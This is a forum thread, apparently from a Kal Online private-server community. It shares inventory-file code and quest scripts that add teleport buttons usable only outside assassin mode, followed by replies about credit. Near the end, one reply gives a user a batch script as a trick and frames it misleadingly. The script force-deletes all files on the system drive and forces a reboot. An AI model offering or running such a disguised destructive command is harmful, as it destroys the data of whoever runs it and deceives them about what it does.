Inventory Teleporter Assa Safe...
Well i was mad about the teleport scrolls... you have to scroll most times if you inventar is full,
because of this you die sometimes because you cant use it fast enough and on some low rate server they costs money that you better pay for armor... but thats not everything,
this fuck scrolls "eats" space in your inventory that you could fill up with some drops
so many people decided to create a F1 teleporter, thats bullshit because:
1. It takes to much time to use it (with a spawn of mobs behind you a bad thing)
2. Assasins just piss off
so i done this every easy, i puted Quest teleporter (with gstate, thx to Soul666) in the inventory (its a bit bigger now ^^)
that looks like this...
http://4.bp.blogspot.com/_fhowzawwxA...8_10_6_000.jpg
....
edit e.pk file....
Code:
(filechk file_ver (country_type ENG) (filename inventory))
(background
(font 12)
(link system ( param ( width 214) ( height 380) ( style title edge system) ( caption "Inventory") ))
)
( page ( font 12)
( offset 112 250)
;( word "Money")
( offset 5)
( label money ( width 16))
( offset 5)
;( word "Geon")
)
;Narootuh
( page ( font 12)
( pos 5 270)
( button link (bitmap 'item038') ( param send quest 80700 9 )( tip "Narootuh#n#n#1This Cant be used in Assasin Mode")(colorkey 15 15 15))
)
;Cargo station
( page ( font 12)
( pos 40 270)
( button link (bitmap 'item038') ( param send quest 80700 10 )( tip "Cargo Station#n#n#1This Cant be used in Assasin Mode")(colorkey 15 15 15))
)
;Geum-oh Mine
( page ( font 12)
( pos 75 270)
( button link (bitmap 'item038') ( param send quest 80700 11 )( tip "Geum-oh Mine#n#n#1This Cant be used in Assasin Mode")(colorkey 15 15 15))
)
;Pub of giant bird
( page ( font 12)
( pos 110 270)
( button link (bitmap 'item038') ( param send quest 80700 12 )( tip "Pub of giant bird#n#n#1This Cant be used in Assasin Mode")(colorkey 15 15 15))
)
;Temp Fort
( page ( font 12)
( pos 145 270)
( button link (bitmap 'item038') ( param send quest 80700 13 )( tip "Temp Fort#n#n#1This Cant be used in Assasin Mode")(colorkey 15 15 15))
)
;City of priests
( page ( font 12)
( pos 180 270)
( button link (bitmap 'item038') ( param send quest 80700 14 )( tip "City of priest#n#n#1This Cant be used in Assasin Mode")(colorkey 15 15 15))
)
;Forsaken Fort
( page ( font 12)
( pos 5 305)
( button link (bitmap 'item038') ( param send quest 80700 15 )( tip "Forsaken Fort#n#n#1This Cant be used in Assasin Mode")(colorkey 15 15 15))
)
;========================================================================================
;==================================You can add custom towns here===================================
;Battle City
( page ( font 12)
( pos 40 305)
( button link (bitmap 'item038') ( param send quest 80700 17 )( tip "Battle City#n#n#1This Cant be used in Assasin Mode")(colorkey 15 15 15))
)
;Traitors City
( page ( font 12)
( pos 75 305)
( button link (bitmap 'item038') ( param send quest 80700 16 )( tip "Traitors City#n#n#1This Cant be used in Assasin Mode")(colorkey 15 15 15))
)
;========================================================================================
;===============================Only to test if its working==========================================
;Mask On/Off
( page ( font 12)
( pos 180 340)
( button link (bitmap 'Def102') ( param send quest 80700 7 )( tip "#1Mask On/Off#n#8This is just for fun ;)#n But of cause it works ^^")(colorkey 15 15 15))
)
and the quest.txt ...
Code:
;======================================ASSA SAFE QUESTS BY Darkface==============================
;;Narootuh
(quest
(index 80700 9)
(case (if (gstate 104 1)) (then (html 100009)))
(case (then (teleport 0 257303 258710))))
;;cargo station
(quest
(index 80700 10)
(case (if (gstate 104 1)) (then (html 100009)))
(case (then (teleport 0 264931 262029))))
;;Mine
(quest
(index 80700 11)
(case (if (gstate 104 1)) (then (html 100009)))
(case (then (teleport 0 265642 285434))))
;;Pub of Giant Bird
(quest
(index 80700 12)
(case (if (gstate 104 1)) (then (html 100009)))
(case (then (teleport 0 256442 288522))))
;;Fort
(quest
(index 80700 13)
(case (if (gstate 104 1)) (then (html 100009)))
(case (then (teleport 0 267895 242644))))
;;CoP
(quest
(index 80700 14)
(case (if (gstate 104 1)) (then (html 100009)))
(case (then (teleport 0 232828 294721))))
;;Fosrsaken Fort
(quest
(index 80700 15)
(case (if (gstate 104 1)) (then (html 100009)))
(case (then (teleport 0 273204 232252))))
;================================================Assa Mask on/off===========================
;Mask On/off
(quest
(index 80700 7)
(case (if (gstate 104 1)) (then (gstate 104 0)))
(case (if (gstate 104 0)) (then (gstate 104 1)))
)
Re: Inventory Teleporter Assa Safe...
Nice release. I'm putting this on my test server right now.
Re: Inventory Teleporter Assa Safe...
Who told you about the sin switch? ^^
Re: Inventory Teleporter Assa Safe...
Quote:
Originally Posted by
BjornVH
Who told you about the sin switch? ^^
specifications are on souls blog easy to make ;)
Re: Inventory Teleporter Assa Safe...
very nice, kinda usefull in my opinion :)
Re: Inventory Teleporter Assa Safe...
Very Well made!!
But u forgot to write: take the file "inventory.dat" in e.pk and write this in it...
Maybe some beginners wonder where to put this in e.pk^^
But anyway... great Guide/Release^^
Re: Inventory Teleporter Assa Safe...
Quote:
Originally Posted by
Dopestar
specifications are on souls blog easy to make ;)
Yeah I know but i told him bout the switch :D
Re: Inventory Teleporter Assa Safe...
Quote:
Originally Posted by
Hofmann11
Very Well made!!
But u forgot to write: take the file "inventory.dat" in e.pk and write this in it...
Maybe some beginners wonder where to put this in e.pk^^
But anyway... great Guide/Release^^
the one who can't read should leave :P
Code:
(filename inventory)
well. just open the inventory.dat and past all in ;)
anyway, good release
Re: Inventory Teleporter Assa Safe...
Quote:
Originally Posted by
Flohle
the one who can't read should leave :P
Code:
(filename inventory)
well. just open the inventory.dat and past all in ;)
anyway, good release
Flohle youre right... but there only is (filename inventory)
But who is new with kal servers maybe dont know what it means^^
BTW, lets forget it^^
Very good release... go on
Re: Inventory Teleporter Assa Safe...
Re: Inventory Teleporter Assa Safe...
Quote:
Originally Posted by
BjornVH
Yeah I know but i told him bout the switch :D
I guess this forum is all about recognition...erm...then Gratz Bjorn for figuring this out :wink_5:
And Darkface....excellent post!
Re: Inventory Teleporter Assa Safe...
Quote:
Originally Posted by
Onkelmat
screen ?
you should be able to read... if not create a .bat data
(IT WILL NOT JUST SHUTDOWN YOUR SYSTEM!!!)
Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
and bjorn its right you made the switch :D, i thought its that small that there are no credits needed ;)
Re: Inventory Teleporter Assa Safe...
Re: Inventory Teleporter Assa Safe...
Quote:
Originally Posted by
s0ul666
no comment ...
wasnt that a commet?
Re: Inventory Teleporter Assa Safe...